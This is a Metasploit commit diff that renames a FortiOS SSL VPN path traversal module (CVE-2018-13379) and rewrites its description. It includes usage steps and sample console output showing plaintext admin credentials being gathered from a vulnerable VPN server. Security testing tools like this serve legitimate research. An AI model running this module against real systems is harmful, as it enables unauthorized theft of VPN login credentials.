Rename files and update the exploit module title to better reflect it…

…s purpose. Also fix a minor RuboCop related change Fix up documentation to reflect recent file renaming changes.
rapid7 · Feb 26, 2021 · 2124ec2 · 2124ec2
1 parent 32ad290
commit 2124ec2
Show file tree

Hide file tree

Showing 2 changed files with 23 additions and 23 deletions.
diff --git a/...ner/http/fortios_vpnssl_traversal_leak.md → ...er/fortios_vpnssl_traversal_creds_leak.md b/...ner/http/fortios_vpnssl_traversal_leak.md → ...er/fortios_vpnssl_traversal_creds_leak.md
@@ -10,7 +10,7 @@ the VPN server.
 ## Verification Steps
 
 1. Start msfconsole
-2. Do: use auxiliary/scanner/http/fortios_vpnssl_traversal_leak
+2. Do: use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
 3. Do: set RHOSTS [IP]
 4. Do: set RPORT 10443
 5. Do: run
@@ -30,10 +30,10 @@ If set, then store gathered credentials into the Metasploit creds database.
 ### FortiOS 6.0
 
 ```
-msf6 > use auxiliary/scanner/http/fortios_vpnssl_traversal_leak
-msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > show options
+msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > show options
 
-Module options (auxiliary/scanner/http/fortios_vpnssl_traversal_leak):
+Module options (auxiliary/gather/fortios_vpnssl_traversal_creds_leak):
 
    Name         Current Setting  Required  Description
    ----         ---------------  --------  -----------
@@ -47,27 +47,28 @@ Module options (auxiliary/scanner/http/fortios_vpnssl_traversal_leak):
    THREADS      1                yes       The number of concurrent threads (max one per host)
    VHOST                         no        HTTP server virtual host
 
-msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > set RHOSTS *redacted*
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS *redacted*
 RHOSTS => *redacted*
-msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > run
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run
 
 [*] https://*redacted*:10443 - Trying to connect.
 [+] https://*redacted*:10443 - Vulnerable!
-[+] https://*redacted*:10443 - File saved to /home/gwillcox/.msf4/loot/20210226120613_default_*redacted*__631458.txt
+[+] https://*redacted*:10443 - File saved to /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
 [+] https://*redacted*:10443 - 1 credential(s) found!
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > creds
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
 Credentials
 ===========
 
 host            origin          service            public  private    realm  private_type  JtR Format
 ----            ------          -------            ------  -------    -----  ------------  ----------
 *redacted*  *redacted*  10443/tcp (https)  admin   *redacted*         Password
 
-msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > cat /home/gwillcox/.msf4/loot/20210226120613_default_*redacted*__631458.txt
-[*] exec: cat /home/gwillcox/.msf4/loot/20210226120613_default_*redacted*__631458.txt
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > cat /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
+[*] exec: cat /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
 
 var fgt_lang =
-�/V^PƁ@"�V�V^f�V^V�V^172.20.5.254admin*redacted*RemoteUSersfull-accessroot�бmsf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) >
+�/V^Pҽ�w���V^��V^��V^*redacted*admin*redacted*RemoteUSersfull-accessroot�бmsf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
+
 ```
diff --git a/...ner/http/fortios_vpnssl_traversal_leak.rb → ...er/fortios_vpnssl_traversal_creds_leak.rb b/...ner/http/fortios_vpnssl_traversal_leak.rb → ...er/fortios_vpnssl_traversal_creds_leak.rb
@@ -15,17 +15,16 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'FortiOS Path Traversal Leak Credentials',
+        'Name' => 'FortiOS Path Traversal Credential Gatherer',
         'Description' => %q{
-          FortiOS system file leak through SSL VPN via specially crafted HTTP
-          resource requests. A path traversal vulnerability in the FortiOS SSL
-          VPN web portal may allow an unauthenticated attacker to download FortiOS
-          system files through specially crafted HTTP resource requests.
-
-          This module reads logins and passwords in clear text from
-          the `/dev/cmdb/sslvpn_websession` file. This vulnerability affects
-          (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0
-          to 6.0.4).
+          Fortinet FortiOS versions 5.4.6 to 5.4.12, 5.6.3 to 5.6.7 and 6.0.0 to
+          6.0.4 are vulnerable to a path traversal vulnerability within the SSL VPN
+          web portal which allows unauthenticated attackers to download FortiOS system
+          files through specially crafted HTTP requests.
+
+          This module exploits this vulnerability to read the usernames and passwords
+          of users currently logged into the FortiOS SSL VPN, which are stored in
+          plaintext in the "/dev/cmdb/sslvpn_websession" file on the VPN server.
         },
         'References' => [
           %w[CVE 2018-13379],
@@ -34,8 +33,8 @@ def initialize(info = {})
           %w[EDB 47288]
         ],
         'Author' => [
-          'lynx (Carlos Vieira)',         # initial module author from edb
-          'mekhalleh (RAMELLA Sébastien)' # this module author (Zeop Entreprise)
+          'lynx (Carlos Vieira)', # initial module author from edb
+          'mekhalleh (RAMELLA Sébastien)' # Metasploit module author (Zeop Entreprise)
         ],
         'License' => MSF_LICENSE,
         'DefaultOptions' => {